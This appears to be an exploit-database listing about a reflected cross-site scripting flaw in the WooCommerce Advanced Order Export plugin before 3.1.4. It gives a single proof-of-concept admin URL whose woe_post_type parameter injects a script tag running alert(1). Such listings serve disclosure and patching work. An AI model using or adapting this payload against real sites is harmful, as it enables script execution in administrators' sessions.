Share
## https://sploitus.com/exploit?id=WPEX-ID:10212
On a WooCommerce installation with a vulnerable Advanced Order Export plugin (< 3.1.4), issue the following request while logged in as Administrator:

https://example.com/wp-admin/admin.php?page=wc-order-export&tab=export&woe_post_type=%22%3E%3Cscript%3Ealert(1);#segment=common